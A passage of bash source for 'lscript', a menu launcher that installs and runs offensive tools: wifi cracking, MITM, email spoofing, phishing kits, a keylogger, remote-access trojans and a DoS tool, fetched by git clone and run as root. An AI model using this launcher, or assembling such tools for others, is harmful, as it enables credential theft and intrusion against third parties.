111 | echo "export PATH=/bin/lscript:$PATH" >> ~/.bashrc
112 | sleep 1
113 | clear
114 | break
115 | fi
116 | done
117 | clear
118 | if [ $OS = 2 ]
119 | then
120 | sudo apt-get install leafpad
121 | sudo apt-get install aircrack-ng
122 | sudo apt-get install git
123 | sudo apt-get install xterm
124 | sudo apt-get install gnome-terminal
125 | sudo apt-get install net-tools
126 | fi
127 | echo -e "DONE"
128 | sleep 1
129 | clear
130 | if [ $OS = 2 ]
131 | then
132 |
133 | echo -e "Open a NEW terminal and type 'u' to launch the script"
134 | sleep 4
135 | gnome-terminal -e u
136 | else
137 | echo -e "Open a NEW terminal and type 'l' to launch the script"
138 | sleep 4
139 | gnome-terminal -e l
140 | fi
141 | sleep 2
142 | kill -9 $PPID
143 |
--------------------------------------------------------------------------------
/l:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | VERSION=2.0.5
3 | HOWMANYTOOLS=31
4 | BACKL="0"
5 | DONATIONS=0
6 | #############DEFAULTS###############
7 | function defaults_l
8 | {
9 | #setting yellow-start
10 | YS="\e[1;33m"
11 | #setting blue-start
12 | BS="\e[0;34m"
13 | #setting color-end
14 | CE="\e[0m"
15 | #setting red-start
16 | RS="\e[1;31m"
17 | #setting frequent stings
18 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
19 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
20 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
21 | PAKT="Press "$YS"any key$CE to"
22 | PAKTC="Press "$YS"any key$CE to continue..."
23 | PAKTGB="Press "$YS"any key$CE to go back..."
24 | TNI=""$RS"Tool is not installed. To install, go back on TOOLS menu,and select 4) Install / reinstall a tool"$CE""
25 | #code to read from keyboard without return
26 | READAK="read -n 1"
27 | #path for lscript
28 | LPATH="/root/lscript"
29 | export LPATH
30 | #path for keyboard shortcuts
31 | KSPATH=""$LPATH"/ks"
32 | export KSPATH
33 | #making sure the kspath is set
34 | if [ ! -d "$KSPATH" ]
35 | then
36 | mkdir "$KSPATH"
37 | fi
38 | }
39 | ##############FUNCTIONS#############
40 | function managed_spaces
41 | {
42 | size=${#WLANN}
43 | calc=$(( 11-size ))
44 | numcalc=1
45 | SPACESN=" "
46 | while [ $numcalc != $calc ]
47 | do
48 | SPACESN=""${SPACESN}" "
49 | numcalc=$(( numcalc+1 ))
50 | done
51 | }
52 | function monitor_spaces
53 | {
54 | size=${#WLANNM}
55 | calc=$(( 11-size ))
56 | numcalc=1
57 | SPACESM=" "
58 | while [ $numcalc != $calc ]
59 | do
60 | SPACESM=""${SPACESM}" "
61 | numcalc=$(( numcalc+1 ))
62 | done
63 | }
64 | function check_wlans
65 | {
66 | CC=$WLANN
67 | WLANCHECKING=$(ifconfig | grep "$WLANN" )
68 | #~ WLANCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
69 | CC=$WLANNM
70 | WLANMCHECKING=$(ifconfig | grep "$WLANNM" )
71 | #~ WLANMCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
72 | }
73 | function banner
74 | {
75 | check_wlans
76 | echo -e ""
77 | echo -e "$RS ██╗ █████╗ ███████╗██╗ ██╗$CE v$VERSION"
78 | echo -e "$RS ██║ ██╔══██╗╚══███╔╝╚██╗ ██╔╝$CE"
79 | echo -e "$RS ██║ ███████║ ███╔╝ ╚████╔╝ $CE by "$RS"ARIS MELACHROINOS$CE"
80 | echo -e "$RS ██║ ██╔══██║ ███╔╝ ╚██╔╝ $CE"
81 | echo -e "$RS The ███████╗██║ ██║███████╗ ██║ script$CE"
82 | echo -e "$RS ╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ $CE"
83 | echo -e ""$YS"if"$CE") Ifconfig"
84 | if [[ $WLANCHECKING = "" ]]
85 | then
86 | echo -e ""$RS" 1"$CE") Enable "$RS"$WLANN"$CE"${SPACESN}"$RS"d1"$CE") Disable "$RS"$WLANN"$CE"${SPACESN} "$RS"|"$CE" "$YS"start"$CE") 1 2 3"
87 | echo -e ""$RS" 2"$CE") Enable "$RS"$WLANNM"$CE"${SPACESM}"$RS"d2"$CE") Disable "$RS"$WLANNM"$CE"${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") d1 d2 d3"
88 | else
89 | echo -e ""$YS" 1"$CE") Enable $WLANN${SPACESN}"$YS"d1"$CE") Disable $WLANN${SPACESN} "$RS"|"$CE" "$YS"start"$CE") 1 2 3"
90 | echo -e ""$YS" 2"$CE") Enable $WLANNM${SPACESM}"$YS"d2"$CE") Disable $WLANNM${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") d1 d2 d3"
91 | fi
92 | echo -e ""$YS" 3"$CE") Change MAC "$YS"d3"$CE") Restore original MAC "$RS"|"$CE""$YS"update"$CE") Check for updates"
93 | if [ -f /usr/bin/anonym8 ]
94 | then
95 | echo -e ""$YS" 4"$CE") Enable anonym8 "$YS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
96 | else
97 | echo -e ""$RS" 4"$CE") Enable anonym8 "$RS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
98 | fi
99 | if [ -f /usr/bin/anonsurf ]
100 | then
101 | echo -e ""$YS" 5"$CE") Enable anonsurf "$YS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
102 | echo -e ""$YS" 6"$CE") Anonsurf's status "$YS"d6"$CE") Restart anonsurf "$RS"|"$CE""$YS"donate"$CE") Buy me a coffee"
103 | else
104 | echo -e ""$RS" 5"$CE") Enable anonsurf "$RS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
105 | echo -e ""$RS" 6"$CE") Anonsurf's status "$RS"d6"$CE") Restart anonsurf "$RS"|"$CE""$YS"donate"$CE") Buy me a coffee"
106 | fi
107 | echo -e ""$YS" 7"$CE") View Public IP"
108 | echo -e ""$YS" 8"$CE") View MAC"
109 | echo -e ""$YS" 9"$CE") TOOLS "$YS"15"$CE") Spoof EMAIL"
110 | if [ -f /root/ngrok ]
111 | then
112 | echo -e ""$YS"10"$CE") Handshake "$YS"16"$CE") Ngrok port forward"
113 | else
114 | echo -e ""$YS"10"$CE") Handshake "$RS"16"$CE") "$RS"Ngrok"$CE" port forward"
115 | fi
116 | echo -e ""$YS"11"$CE") Find WPS pin "
117 | echo -e ""$YS"12"$CE") WEP hacking "
118 | echo -e ""$YS"13"$CE") MITM "
119 | echo -e ""$YS"14"$CE") Metasploit "
120 | echo -e ""$YS" 0"$CE") EXIT"
121 | echo "Choose: "
122 | read -e YORNAA
123 | clear
124 | }
125 | function enable_wlan
126 | {
127 | echo -e "Enabling $WLANN..."
128 | rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
129 | (ifconfig $WLANN up &>/dev/null && echo -e "Done" ) || echo -e ""$RS"Error. I can't find your wireless adapter"$CE""
130 | }
131 | function disable_wlan
132 | {
133 | echo -e "Disabling $WLANN..."
134 | rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
135 | (ifconfig $WLANN down &>/dev/null && echo -e "Done" ) || echo -e ""$RS"Error. I can't find your wireless adapter."$CE""
136 | }
137 | function stop_monitor
138 | {
139 | echo -e "Disabling $WLANNM..."
140 | echo -e "Stopping monitor mode..."
141 | (airmon-ng stop $WLANNM &>/dev/null && echo -e "Done" ) || echo -e ""$RS"Error stoping monitor mode."$CE""
142 | echo -e "ok..."
143 | echo -e "Starting network-manager service..."
144 | service network-manager start
145 | echo -e "ok..."
146 | }
147 | function interface_selection
148 | {
149 | if [[ $WLANCHECKING = "" ]]
150 | then
151 | echo -e "$RS 1$CE) $WLANN"
152 | else
153 | echo -e "$YS 1$CE) $WLANN"
154 | fi
155 | if [[ $WLANMCHECKING = "" ]]
156 | then
157 | echo -e "$RS 2$CE) $WLANNM"
158 | else
159 | echo -e "$YS 2$CE) $WLANNM"
160 | fi
161 | echo -e "$YS 3$CE) Eth0"
162 | echo -e ""$YS"00$CE) Main menu"
163 | echo -e "$YS 0$CE) EXIT"
164 | echo -e "Choose: "
165 | read -e MYINT
166 | if [ "$MYINT" = "2" ]
167 | then
168 | if [[ $WLANMCHECKING = "" ]]
169 | then
170 | MYINT="OFF"
171 | else
172 | MYINT="$WLANNM"
173 | fi
174 | elif [ "$MYINT" = "1" ]
175 | then
176 | if [[ $WLANCHECKING = "" ]]
177 | then
178 | MYINT="OFF"
179 | else
180 | MYINT="$WLANN"
181 | fi
182 | elif [ "$MYINT" = "0" ]
183 | then
184 | clear
185 | exit
186 | elif [ "$MYINT" = "00" ]
187 | then
188 | exec bash "$0"
189 | elif [ "$MYINT" = "3" ]
190 | then
191 | MYINT="eth0"
192 | else
193 | echo -e "Wrong choice..."
194 | sleep 2
195 | clear
196 | echo -e "EXITING"
197 | sleep 1
198 | exec bash "$0"
199 | fi
200 | export MYINT
201 | }
202 | function change_mac
203 | {
204 | interface_selection
205 | clear
206 | if [[ $MYINT = "OFF" ]]
207 | then
208 | echo -e "Interface not available"
209 | sleep 2
210 | else
211 | echo -e "Change it to a random or specific?("$YS"r"$CE"/"$YS"s"$CE")("$YS"Enter"$CE"=r): "
212 | read -e RORS
213 | clear
214 | if [ "$RORS" != "s" ]
215 | then
216 | echo -e "Changing mac address of $MYINT to a random one..."
217 | ifconfig $MYINT down
218 | macchanger -r $MYINT
219 | ifconfig $MYINT up
220 | echo -e "Done."
221 | else
222 | echo -e "Enter the MAC you want:"
223 | read -e SMAC
224 | echo -e "Changing mac address of $MYINT to $SMAC..."
225 | ifconfig $MYINT down
226 | macchanger -m $SMAC $MYINT
227 | ifconfig $MYINT up
228 | echo -e "Done."
229 | fi
230 | fi
231 | }
232 | function set_interface_number
233 | {
234 | while true
235 | do
236 | #~ echo -e "Enter the number of your wireless card(e.g: type "$YS"0"$CE" if wlan0): "
237 | #~ read INUMB
238 | #~ echo -e "So your wireless interfaces are wlan$INUMB and wlan"$INUMB"mon?"$YNYES": "
239 | #~ read INTCONFNUMB
240 | #~ if [ "$INTCONFNUMB" = "n" ]
241 | #~ then
242 | #~ clear
243 | #~ echo -e "Then why did you type that? lol"
244 | #~ sleep 3
245 | #~ continue
246 | #~ else
247 | #~ echo wlan$INUMB > "$LPATH"/wlan.txt
248 | #~ echo wlan"$INUMB"mon > "$LPATH"/wlanmon.txt
249 | #~ echo -e "Done "
250 | #~ sleep 1
251 | #~ clear
252 | #~ echo -e "If you want to change it, type "$YS"interface"$CE" any time"
253 | #~ sleep 3
254 | #~ echo -e "$PAKTC"
255 | #~ $READAK
256 | #~ break
257 | #~ fi
258 | echo -e "Enter the name of your wireless interface when in "$RS"managed"$CE" mode.(e.g:"$YS"wlan0"$CE"): "
259 | read MANAGED
260 | echo -e "Enter the name of your wireless interface when in "$RS"monitor"$CE" mode.(e.g:"$YS"wlan0mon"$CE"): "
261 | read MONITOR
262 | echo $MANAGED > "$LPATH"/wlan.txt
263 | echo $MONITOR > "$LPATH"/wlanmon.txt
264 | echo -e "Done "
265 | sleep 1
266 | clear
267 | echo -e "If you want to change it, type "$YS"interface"$CE" any time"
268 | sleep 3
269 | echo -e "$PAKTC"
270 | $READAK
271 | BACKL="1"
272 | break
273 | done
274 | }
275 | function checkifalready
276 | {
277 | GOOD="1"
278 | num=1
279 | while [ $num -le 20 ]
280 | do
281 | if [ "$CHECKKS" = "$num" ]
282 | then
283 | GOOD="0"
284 | echo -e "This shortcut is already in use by the script."
285 | sleep 3
286 | fi
287 | num=$(( num+1 ))
288 | done
289 | if [ "$GOOD" = "1" ]
290 | then
291 | if [ "$CHECKKS" = "" ] || [ "$CHECKKS" = "if" ] || [ "$CHECKKS" = "ifconfig" ] || [ "$CHECKKS" = "interfaces" ] || [ "$CHECKKS" = "interface" ] || [ "$CHECKKS" = "errors" ] || [ "$CHECKKS" = "00" ] || [ "$CHECKKS" = "exit" ] || [ "$CHECKKS" = "update" ] || [ "$CHECKKS" = "d1" ] || [ "$CHECKKS" = "d2" ] || [ "$CHECKKS" = "d3" ] || [ "$CHECKKS" = "d4" ] || [ "$CHECKKS" = "d5" ] || [ "$CHECKKS" = "d6" ] || [ "$CHECKKS" = "d7" ] || [ "$CHECKKS" = "gg" ] || [ "$CHECKKS" = "ks" ]
292 | then
293 | GOOD="0"
294 | echo -e "This shortcut is already in use by the script."
295 | sleep 3
296 | fi
297 | fi
298 | if [ "$CHECKKS" = "delete" ]
299 | then
300 | GOOD="0"
301 | fi
302 | if [ "$GOOD" = "1" ]
303 | then
304 | BACKUPTITLE="$TITLE"
305 | BACKUPNN="$nn"
306 | num=1
307 | while [ $num -le "$HOWMANYTOOLS" ]
308 | do
309 | nn="$num"
310 | listshortcuts
311 | if [ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]
312 | then
313 | read KSIFALREADY < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
314 | if [ "$CHECKKS" == "$KSIFALREADY" ]
315 | then
316 | echo -e "Shortcut '"$CHECKKS"' is already in use by "$TITLE""
317 | GOOD=0
318 | sleep 3
319 | fi
320 | fi
321 | num=$(( num+1 ))
322 | done
323 | nn="$BACKUPNN"
324 | TITLE="$BACKUPTITLE"
325 | fi
326 | clear
327 | }
328 | function createshortcut
329 | {
330 | if [ ! -d ""$KSPATH"/$TITLE" ]
331 | then
332 | mkdir "$KSPATH"/"$TITLE"
333 | fi
334 | clear
335 | echo -e "Enter the keyboard shortcut that will open "$TITLE" from lscript's main menu"
336 | echo -e "(e.g: "$YS""$TITLE""$CE")"
337 | echo -e "To delete it , type: "$YS"delete"$CE""
338 | echo -e ""$YS"back"$CE") Go back"
339 | read CHECKKS
340 | if [ "$CHECKKS" == "back" ]
341 | then
342 | clear
343 | BACKKS=1
344 | else
345 | BACKKS=0
346 | fi
347 | if [ "$BACKKS" == 0 ]
348 | then
349 | CHECKKSBACKUP="$CHECKKS"
350 | NAMECDBACKUP="$NAMECD"
351 | KSSETBACKUP="$KSSET"
352 | checkifalready
353 | CHECKKS="$CHECKKSBACKUP"
354 | NAMECD="$NAMECDBACKUP"
355 | KSSET="$KSSETBACKUP"
356 | if [ "$GOOD" = "1" ]
357 | then
358 | echo -e "Shortcut is ok.Setting it up..."
359 | sleep 1
360 | echo "$CHECKKS" > "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
361 | echo "$NAMECD" > "$KSPATH"/"$TITLE"/"$TITLE".txt
362 | echo "$KSSET" > "$KSPATH"/"$TITLE"/"$TITLE"2.txt
363 | echo -e "Done!"
364 | echo -e "$PAKTGB"
365 | $READAK
366 | clear
367 | #break
368 | else
369 | clear
370 | echo -e "Removing shortcut for "$TITLE"..."
371 | rm -r "$KSPATH"/"$TITLE"
372 | sleep 1
373 | echo -e "Done."
374 | echo -e "$PAKTGB"
375 | $READAK
376 | clear
377 | #break
378 | fi
379 | fi
380 | }
381 | function listshortcuts
382 | {
383 | EXTRA1=""
384 | if [ "$nn" = "1" ]
385 | then
386 | TITLE="Fluxion"
387 | NAMECD="cd /root/fluxion"
388 | KSSET="./fluxion"
389 | elif [ "$nn" = "2" ]
390 | then
391 | TITLE="Zirikatu"
392 | NAMECD="cd /root/zirikatu"
393 | KSSET="./zirikatu.sh"
394 | elif [ "$nn" = "3" ]
395 | then
396 | TITLE="Wifite"
397 | NAMECD=""
398 | KSSET="wifite"
399 | elif [ "$nn" = "4" ]
400 | then
401 | TITLE="Wifiphisher"
402 | NAMECD=""
403 | KSSET="wifiphisher"
404 | elif [ "$nn" = "5" ]
405 | then
406 | TITLE="Zatacker"
407 | NAMECD="cd /root/Zatacker"
408 | KSSET="./ZT.sh"
409 | elif [ "$nn" = "6" ]
410 | then
411 | TITLE="Morpheus"
412 | NAMECD="cd /root/morpheus"
413 | KSSET="./morpheus.sh"
414 | elif [ "$nn" = "7" ]
415 | then
416 | TITLE="Hakku"
417 | NAMECD="cd /root/hakkuframework"
418 | KSSET="./hakku"
419 | elif [ "$nn" = "8" ]
420 | then
421 | TITLE="Trity"
422 | NAMECD=""
423 | KSSET="trity"
424 | elif [ "$nn" = "9" ]
425 | then
426 | TITLE="Cupp"
427 | NAMECD="cd /root/cupp"
428 | KSSET="python cupp.py -i"
429 | elif [ "$nn" = "10" ]
430 | then
431 | TITLE="Dracnmap"
432 | NAMECD="cd /root/Dracnmap"
433 | KSSET="./dracnmap-v*.sh"
434 | elif [ "$nn" = "11" ]
435 | then
436 | TITLE="Fern"
437 | NAMECD=""
438 | KSSET="fern-wifi-cracker"
439 | elif [ "$nn" = "12" ]
440 | then
441 | TITLE="KickThemOut"
442 | NAMECD="cd /root/kickthemout"
443 | KSSET="python kickthemout.py"
444 | elif [ "$nn" = "13" ]
445 | then
446 | TITLE="Ghost-Phisher"
447 | NAMECD=""
448 | KSSET="ghost-phisher"
449 | elif [ "$nn" = "14" ]
450 | then
451 | TITLE="Xerxes"
452 | NAMECD="cd /root/xerxes"
453 | KSSET="./xerxes"
454 | elif [ "$nn" = "15" ]
455 | then
456 | TITLE="Katana"
457 | NAMECD=""
458 | KSSET="ktf.console"
459 | elif [ "$nn" = "16" ]
460 | then
461 | TITLE="Airgeddon"
462 | NAMECD="cd /root/airgeddon"
463 | KSSET="./airgeddon.sh"
464 | elif [ "$nn" = "17" ]
465 | then
466 | TITLE="Websploit"
467 | NAMECD=""
468 | KSSET="websploit"
469 | elif [ "$nn" = "18" ]
470 | then
471 | TITLE="BeeLogger"
472 | NAMECD="cd /root/BeeLogger"
473 | KSSET="python bee.py"
474 | elif [ "$nn" = "19" ]
475 | then
476 | TITLE="Ezsploit"
477 | NAMECD="cd /root/exsploit"
478 | KSSET="./ezsploit.sh"
479 | elif [ "$nn" = "20" ]
480 | then
481 | TITLE="Pupy"
482 | NAMECD="cd /root/pupy/pupy"
483 | KSSET="./pupysh.py"
484 | elif [ "$nn" = "21" ]
485 | then
486 | TITLE="TheFatRat"
487 | NAMECD="cd /root/TheFatRat"
488 | KSSET="./fatrat"
489 | elif [ "$nn" = "22" ]
490 | then
491 | TITLE="Angry_IP_Scanner"
492 | NAMECD=" "
493 | KSSET="gnome-terminal --geometry 1x1+9999+9999 -e /usr/bin/ipscan & disown"
494 | #~ elif [ "$nn" = "23" ]
495 | #~ then
496 | #~ TITLE="Sniper"
497 | #~ NAMECD='read -p 'DOMAIN:' DOMAIN'
498 | #~ KSSET="sniper $DOMAIN"
499 | elif [ "$nn" = "23" ]
500 | then
501 | TITLE="ReconDog"
502 | NAMECD="cd /root/ReconDog"
503 | KSSET="python dog.py"
504 | elif [ "$nn" = "24" ]
505 | then
506 | TITLE="RED_HAWK"
507 | NAMECD="cd /root/RED_HAWK"
508 | KSSET="php rhawk.php"
509 | elif [ "$nn" = "25" ]
510 | then
511 | TITLE="Winpayloads"
512 | NAMECD="cd /root/Winpayloads"
513 | KSSET="./WinPayloads.py"
514 | elif [ "$nn" = "26" ]
515 | then
516 | TITLE="CHAOS"
517 | NAMECD="cd /root/CHAOS"
518 | KSSET="go run CHAOS.go"
519 | elif [ "$nn" = "27" ]
520 | then
521 | TITLE="Routersploit"
522 | NAMECD="cd /root/routersploit"
523 | KSSET="./rsf.py"
524 | elif [ "$nn" = "28" ]
525 | then
526 | TITLE="nWatch"
527 | NAMECD="cd /root/nWatch"
528 | KSSET="python nwatch.py"
529 | elif [ "$nn" = "29" ]
530 | then
531 | TITLE="Eternal_scanner"
532 | NAMECD="cd /root/eternal_scanner"
533 | KSSET="./escan"
534 | elif [ "$nn" = "30" ]
535 | then
536 | TITLE="LALIN"
537 | NAMECD="cd /root/LALIN"
538 | KSSET="./Lalin.sh"
539 | elif [ "$nn" = "31" ]
540 | then
541 | TITLE="Shellter"
542 | NAMECD=""
543 | KSSET="shellter"
544 | fi
545 | }
546 | function reinstall_tools
547 | {
548 | while true
549 | do
550 | clear
551 | echo -e "Select a tool to install/reinstall"
552 | echo -e " "$YS"1"$CE") Fluxion "$YS"21"$CE") 4nonimizer "$YS"41"$CE") Infoga"
553 | echo -e ""$YS" 2"$CE") Wifite "$YS"22"$CE") Openvas "$YS"42"$CE") nWatch"
554 | echo -e ""$YS" 3"$CE") Wifiphisher "$YS"23"$CE") BeeLogger "$YS"43"$CE") Eternal scanner"
555 | echo -e ""$YS" 4"$CE") Zatacker "$YS"24"$CE") Ezsploit "$YS"44"$CE") Eaphammer"
556 | echo -e ""$YS" 5"$CE") Morpheus "$YS"25"$CE") Pupy "$YS"45"$CE") Dagon"
557 | echo -e ""$YS" 6"$CE") Osrfconsole "$YS"26"$CE") Zirikatu "$YS"46"$CE") Lalin"
558 | echo -e ""$YS" 7"$CE") Hakku "$YS"27"$CE") WiFi-autopwner "$YS"47"$CE") Knockmail"
559 | echo -e ""$YS" 8"$CE") Trity "$YS"28"$CE") Bully "$YS"48"$CE") BoopSuite"
560 | echo -e ""$YS" 9"$CE") Cupp "$YS"29"$CE") Anonsurf "$YS"49"$CE") Ngrok"
561 | echo -e ""$YS"10"$CE") Dracnmap "$YS"30"$CE") Anonym8"
562 | echo -e ""$YS"11"$CE") Fern "$YS"31"$CE") TheFatRat"
563 | echo -e ""$YS"12"$CE") Netdiscover "$YS"32"$CE") Angry IP Scanner"
564 | echo -e ""$YS"13"$CE") KickThemOut "$YS"33"$CE") Sniper"
565 | echo -e ""$YS"14"$CE") Ghost-Phisher "$YS"34"$CE") ReconDog"
566 | echo -e ""$YS"15"$CE") The Eye "$YS"35"$CE") RED HAWK"
567 | echo -e ""$YS"16"$CE") Xerxes "$YS"36"$CE") WinPayloads"
568 | echo -e ""$YS"17"$CE") Mdk3-master "$YS"37"$CE") Shellter"
569 | echo -e ""$YS"18"$CE") Katana Framework "$YS"38"$CE") CHAOS"
570 | echo -e ""$YS"19"$CE") Airgeddon "$YS"39"$CE") Routersploit"
571 | echo -e ""$YS"20"$CE") Websploit "$YS"40"$CE") Geany"
572 | echo -e ""$YS"back"$CE") Go back"
573 | echo -e ""$YS" 0"$CE") Exit"
574 | echo -e "Choose: "
575 | read REIN
576 | clear
577 | if [ "$REIN" = "1" ]
578 | then
579 | if [ -d "/root/fluxion" ]
580 | then
581 | echo -e "Removing old..."
582 | echo -e "$PAKTC"
583 | $READAK
584 | rm -r /root/fluxion
585 | fi
586 | echo -e "Installing fluxion"
587 | echo -e "Tool by Deltaxflux"
588 | sleep 1
589 | cd
590 | wget https://fluxion.tk/fluxion-unstable.zip
591 | apt-get install unzip
592 | clear
593 | unzip /root/fluxion*.zip -d /root
594 | cd /root/fluxion/install
595 | chmod +x install.sh
596 | ./install.sh
597 | elif [ "$REIN" = "2" ]
598 | then
599 | apt-get install wifite
600 | elif [ "$REIN" = "3" ]
601 | then
602 | if [ -d "/root/wifiphisher" ]
603 | then
604 | echo -e "Removing old..."
605 | echo -e "$PAKTC"
606 | $READAK
607 | rm -r /root/wifiphisher
608 | fi
609 | echo -e "Installing Wifiphisher"
610 | echo -e "Tool idea by Dan McInerney"
611 | sleep 1
612 | cd
613 | git clone https://github.com/wifiphisher/wifiphisher.git
614 | cd wifiphisher
615 | sudo python setup.py install
616 | sleep 1
617 | elif [ "$REIN" = "4" ]
618 | then
619 | echo -e "I cannot install Zatacker. Please google how to do that yourself."
620 | echo -e "PAKTGB"
621 | read
622 | elif [ "$REIN" = "5" ]
623 | then
624 | if [ -d "/root/morpheus" ]
625 | then
626 | echo -e "Removing old..."
627 | echo -e "$PAKTC"
628 | $READAK
629 | rm -r /root/morpheus
630 | fi
631 | echo -e "Installing Morpheus"
632 | echo -e "Tool by Pedro ubuntu [ r00t-3xp10it ]"
633 | sleep 1
634 | cd
635 | git clone https://github.com/r00t-3xp10it/morpheus.git
636 | cd morpheus
637 | chmod +x morpheus.sh
638 | elif [ "$REIN" = "6" ]
639 | then
640 | pip install osrframework
641 | elif [ "$REIN" = "7" ]
642 | then
643 | if [ -d "/root/hakkuframework" ]
644 | then
645 | echo -e "Removing old..."
646 | echo -e "$PAKTC"
647 | $READAK
648 | rm -r /root/hakkuframework
649 | fi
650 | echo -e "Installing Hakku"
651 | echo -e "Tool by 4shadoww"
652 | sleep 1
653 | cd
654 | git clone https://github.com/4shadoww/hakkuframework.git
655 | cd hakkuframework
656 | chmod +x hakku
657 | chmod +x install
658 | elif [ "$REIN" = "8" ]
659 | then
660 | if [ -d "/root/Trity" ]
661 | then
662 | echo -e "Removing old..."
663 | echo -e "$PAKTC"
664 | $READAK
665 | rm -r /root/Trity
666 | fi
667 | echo -e "Installing Trity"
668 | echo -e "Tool by Toxic-ig"
669 | sleep 1
670 | git clone https://github.com/toxic-ig/Trity.git
671 | cd Trity
672 | sudo python install.py
673 | elif [ "$REIN" = "9" ]
674 | then
675 | if [ -d "/root/cupp" ]
676 | then
677 | echo -e "Removing old..."
678 | echo -e "$PAKTC"
679 | $READAK
680 | rm -r /root/cupp
681 | fi
682 | echo -e "Installing Cupp"
683 | echo -e "Tool by Muris Kurgas"
684 | sleep 1
685 | cd
686 | git clone https://github.com/Mebus/cupp.git
687 | cd cupp
688 | chmod +x cupp.py
689 | elif [ "$REIN" = "10" ]
690 | then
691 | if [ -d "/root/Dracnmap" ]
692 | then
693 | echo -e "Removing old..."
694 | echo -e "$PAKTC"
695 | $READAK
696 | rm -r /root/Dracnmap
697 | fi
698 | echo -e "Installing Dracnmap"
699 | echo -e "Tool by Edo -maland-"
700 | cd
701 | git clone https://github.com/Screetsec/Dracnmap.git
702 | cd Dracnmap
703 | chmod +x Dracnmap.sh
704 | elif [ "$REIN" = "11" ]
705 | then
706 | if [ -d "/root/Fern-Wifi-Cracker" ]
707 | then
708 | echo -e "Removing old..."
709 | echo -e "$PAKTC"
710 | $READAK
711 | rm -r /root/Fern-Wifi-Cracker
712 | fi
713 | echo -e "Installing Fern"
714 | echo -e "Tool by Savio-code"
715 | sleep 1
716 | cd
717 | svn checkout http://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/
718 | cd Fern-Wifi-Cracker
719 | chmod +x execute.py
720 | elif [ "$REIN" = "12" ]
721 | then
722 | apt-get install netdiscover
723 | elif [ "$REIN" = "13" ]
724 | then
725 | if [ -d "/root/kickthemout" ]
726 | then
727 | echo -e "Removing old..."
728 | echo -e "$PAKTC"
729 | $READAK
730 | rm -r /root/kickthemout
731 | fi
732 | echo -e "Installing Kichthemout"
733 | echo -e "Tool by Nikolaos Kamarinakis & David Schütz"
734 | sleep 2
735 | apt-get install nmap
736 | git clone https://github.com/k4m4/kickthemout.git
737 | cd kickthemout/
738 | sudo python -m pip install -r requirements.txt
739 | elif [ "$REIN" = "14" ]
740 | then
741 | if [ -d "/root/ghost-phisher" ]
742 | then
743 | echo -e "Removing old..."
744 | echo -e "$PAKTC"
745 | $READAK
746 | rm -r /root/ghost-phisher
747 | fi
748 | echo -e "Installing Ghost-Phisher"
749 | echo -e "Tool by Savio-code"
750 | sleep 1
751 | cd
752 | git clone https://github.com/savio-code/ghost-phisher.git
753 | sleep 1
754 | chmod +x /root/ghost-phisher/Ghost-Phisher/ghost.py
755 | elif [ "$REIN" = "15" ]
756 | then
757 | if [ -d "/root/The-Eye" ]
758 | then
759 | echo -e "Removing old..."
760 | echo -e "$PAKTC"
761 | $READAK
762 | rm -r /root/The-Eye
763 | fi
764 | echo -e "Installing The Eye"
765 | echo -e "Tool by EgeBalci"
766 | sleep 1
767 | cd
768 | git clone https://github.com/EgeBalci/The-Eye.git
769 | cd The-Eye
770 | chmod +x TheEye
771 | elif [ "$REIN" = "16" ]
772 | then
773 | if [ -d "/root/xerxes" ]
774 | then
775 | echo -e "Removing old..."
776 | echo -e "$PAKTC"
777 | $READAK
778 | rm -r /root/xerxes
779 | fi
780 | echo -e "Installing Xerxes"
781 | echo -e "Tool by zanyarjamal"
782 | cd
783 | git clone https://github.com/zanyarjamal/xerxes
784 | cd xerxes
785 | gcc xerxes.c -o xerxes
786 | elif [ "$REIN" = "17" ]
787 | then
788 | if [ -d "/root/mdk3-master" ]
789 | then
790 | echo -e "Removing old..."
791 | echo -e "$PAKTC"
792 | $READAK
793 | rm -r /root/mdk3-master
794 | fi
795 | echo -e "Installing Mdk3-master"
796 | echo -e "Tool by Musket Developer"
797 | cd
798 | git clone https://github.com/wi-fi-analyzer/mdk3-master.git
799 | cd /root/mdk3-master
800 | make
801 | make install
802 | elif [ "$REIN" = "18" ]
803 | then
804 | if [ -d "/root/KatanaFramework" ]
805 | then
806 | echo -e "Removing old..."
807 | echo -e "$PAKTC"
808 | $READAK
809 | rm -r /root/KatanaFramework
810 | fi
811 | echo -e "Installing Katana framework"
812 | echo -e "Tool by PowerScript"
813 | cd
814 | git clone https://github.com/PowerScript/KatanaFramework.git
815 | cd KatanaFramework
816 | sh dependencies
817 | python install
818 | elif [ "$REIN" = "19" ]
819 | then
820 | if [ -d "/root/airgeddon" ]
821 | then
822 | echo -e "Removing old..."
823 | echo -e "$PAKTC"
824 | $READAK
825 | rm -r /root/airgeddon
826 | fi
827 | echo -e "Installing..."
828 | sleep 1
829 | echo -e "Installing Airgeddon"
830 | echo -e "Tool by v1s1t0r1sh3r3"
831 | cd
832 | git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
833 | cd airgeddon
834 | chmod +x airgeddon.sh
835 | elif [ "$REIN" = "20" ]
836 | then
837 | apt-get install websploit
838 | elif [ "$REIN" = "21" ]
839 | then
840 | if [ -d "/root/4nonimizer" ]
841 | then
842 | echo -e "Removing old..."
843 | echo -e "$PAKTC"
844 | $READAK
845 | rm -r /root/4nonimizer
846 | fi
847 | echo -e "Installing 4nonimizer"
